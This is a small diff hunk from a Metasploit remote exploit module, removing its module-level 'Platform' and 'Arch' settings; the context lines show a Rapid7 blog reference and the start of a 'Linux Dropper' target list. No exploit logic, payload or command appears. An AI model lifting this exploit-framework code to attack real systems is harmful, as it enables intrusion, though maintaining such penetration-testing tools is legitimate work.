@@ -32,8 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats']
         ],
 
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Targets' => [
           [
             'Linux Dropper', {
